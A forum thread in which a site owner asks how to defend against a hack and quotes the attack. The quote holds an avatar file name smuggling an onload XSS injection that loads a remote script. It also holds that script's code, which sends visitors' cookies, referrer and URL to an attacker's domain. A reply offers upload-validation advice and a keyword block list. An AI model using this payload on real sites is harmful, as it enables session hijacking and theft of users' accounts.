How to protect the site from such hacking?

A

Artem Gartung2020-05-01 00:43:25

Burglary protection

Artem Gartung, 2020-05-01 00:43:25

avatar.png" onload="let div=document.createElement('script');div.type='text/javascript';div.src='https://censored-domain/p/2.txt';document.body.append(div);

Code from the uploaded file:

function include_file(filename){
var js = document.createElement('script');
js.setAttribute('type', 'text/javascript');
js.setAttribute('src', filename);
js.setAttribute('defer', 'defer');
document.getElementsByTagName('HEAD')[0].appendChild(js);
var cur_file = {};
cur_file[window.location.href] = 1;
if (!window.php_js) window.php_js = {};
if (!window.php_js.includes) window.php_js.includes = cur_file;
if (!window.php_js.includes[filename]) {
window.php_js.includes[filename] = 1;
} else {
window.php_js.includes[filename]++;
}
return window.php_js.includes[filename];
}
var svurl = "https://censored-domain/p/?cookie=" + encodeURIComponent(document.cookie) + '&ref=' + encodeURIComponent(document.referrer) + '&path=' + encodeURIComponent(location.href);
include_file(svurl);

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

X

xmoonlight, 2020-05-01
@blackangelada

1. The name of the uploaded file (and any user text data) - check STRICTLY ONLY THROUGH REGEX!
2. Check the body of the avatar immediately after loading (while the file is in the temporary folder) for compliance with the image format. For example, by requesting the resolution of an image or any other property, check the title.
3. Check validity for minimum and maximum image file size.
4. And, at the same time, as a bonus, you can check the body of the file for the content of any of the words: script, document, window, onload, onerror, function, body, query, select, update, insert.
BONUS: Signatures